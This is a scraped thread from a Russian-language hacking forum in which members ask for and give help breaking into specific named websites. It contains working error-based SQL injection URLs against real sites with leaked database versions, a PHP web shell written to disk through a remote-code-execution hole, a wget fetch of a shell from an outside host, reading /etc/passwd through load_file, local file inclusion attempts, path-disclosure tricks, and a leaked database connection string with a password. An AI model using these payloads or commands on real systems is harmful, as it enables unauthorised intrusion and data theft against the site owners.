Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. lessmore

    lessmore New Member

    Joined:
    9 Apr 2011
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    But how?

    http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=%bf'%bf"

    http://www.knullis.com/out.php?trade=\%27

    Thanks!
     
  2. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    It's all very simple

    _http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=1%22and(select(1)from(select(count(*)),concat((select(version())from(information_schema.tables)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and%22

    Duplicate entry '5.0.95' for key 1 Error no:1062
     
    1 person likes this.
  3. z0mbie86

    z0mbie86 New Member

    Joined:
    25 Jul 2009
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    В web.config нашел такую строчку
    <add name="ConnectionString" connectionString="Data Source=serv;Persist Security Info=True;User ID=Report;Password=bigem;" providerName="System.Data.OracleClient"/>

    Как подключится? Я так понял через клиент oracle, если да то где скачать клиент и как подключится?
     
  4. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    ну да, как и всегда стандартыми методами
     
    #22245 qaz, 5 Jun 2013
    Last edited: 5 Jun 2013
  6. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    112
    Likes Received:
    11
    Reputations:
    0
    Нашел сайт с RCE.
    Ввожу: wget http://site.ru/shell.php
    Выдает:
    С curl'ом такая же проблема.
    Если написать просто wget:
    Остальные команды (rm\ls -la\etc) выполняет нормально. :confused:
    Могу создавать файлы. Правда если:
    echo <?php system($_GET[cmd]); ?> > 1.php
    то:
    500 Internal Server Error
     
    #22246 Ups, 5 Jun 2013
    Last edited: 5 Jun 2013
  7. z0mbie86

    z0mbie86 New Member

    Joined:
    25 Jul 2009
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    [​IMG]
    вот такую ошибку выдает
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    echo "<?php system($_GET[cmd]); ?>" > 1.php
    и убедись, что есть права на запись.
     
  9. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    112
    Likes Received:
    11
    Reputations:
    0
    Выполнилось..но и ничего не закачалось. :(
     
  10. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    112
    Likes Received:
    11
    Reputations:
    0
    Code:
    ls -al /tmp/
    Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 700 bytes)
    В аську отписал.
     
  11. stan_q

    stan_q Member

    Joined:
    1 Aug 2009
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.
     
    #22251 stan_q, 5 Jun 2013
    Last edited: 6 Jun 2013
  12. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    load_file('/etc/passwd')

    так иногда можно через скулю путь посмотреть
     
    #22252 er9j6@, 5 Jun 2013
    Last edited: 6 Jun 2013
  13. stan_q

    stan_q Member

    Joined:
    1 Aug 2009
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/

    ЗЫ Почему-то при написании в адресной строке браузера load_file('/etc/passwd') сайт подвисает, а если захексить - то все норм. И такое на всех сайтах и всех основных браузерах...
     
  14. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    Тогда в базе поищи, например у Joomla в таблице jos_session и колонка data путь прописан
     
    #22254 er9j6@, 6 Jun 2013
    Last edited: 6 Jun 2013
    1 person likes this.
  15. LomasterII

    LomasterII New Member

    Joined:
    7 Jan 2013
    Messages:
    23
    Likes Received:
    4
    Reputations:
    5
    подскажите, это инъекция? в конце fid
    (пробелы убрать)
    если да, то как от туда данные вытащить? пробовал, не получается
     
    #22255 LomasterII, 6 Jun 2013
    Last edited: 6 Jun 2013
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    дальше и на угад можно, ведь не такуж и много вариантов, советую почитать
    http://mh-proxy.ru/blog/index.php?mod=read&id=15


    PHP:
    http://onlineracer.softgames.de/softgames/mobile/index_softgames.php?token=8EFCF9FAD3B2A421038C4CE2FB2DC0C7&sig=D8849E4E00B50E2E120D56366B072D1E&api_id=2446802&referrer=user_apps&method=getenemygarage&fid=1+and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%281%29=%201
    column name '5.1.63-0+squeeze1-log''
     
    2 people like this.
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    802
    Reputations:
    605
    пытайся найти phpinfo
     
    _________________________
  18. Sidarovich1975

    Joined:
    4 Oct 2009
    Messages:
    60
    Likes Received:
    16
    Reputations:
    7
    1)Попробуй
    /etc/httpd/vhosts/default.conf
    /etc/httpd/vhosts/(домен).conf

    2)Прогони сканером директорий на стандартные пути к файлу с phpinfo(); (часто оставляют в корне web директории что-нибудь типа info.php, phpinfo.php, 1.php, и так далее) . там можно будет прочитать путь.

    3) Посмотри что еще за сайты на сервере (можно здесь http://madnet.name/tools/madss/ ), спровоцируй ошибку на других доменах, так же попробуй найти на них пхпинфо, по шаблону подобрать путь к основной жертве.
     
  19. infoseller

    infoseller Member

    Joined:
    17 Aug 2011
    Messages:
    136
    Likes Received:
    13
    Reputations:
    0
    testvanieva.kz/login.php?language=../index
    дальше можно как-нибудь?
     
  20. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Кто может раскрутить это не блайндом а чтобы вывод был нормальный ? Там походу какойто фильтр на union

    Для авторизации trol@mailforspam.com:123456
     
Loading...
Thread Status:
Not open for further replies.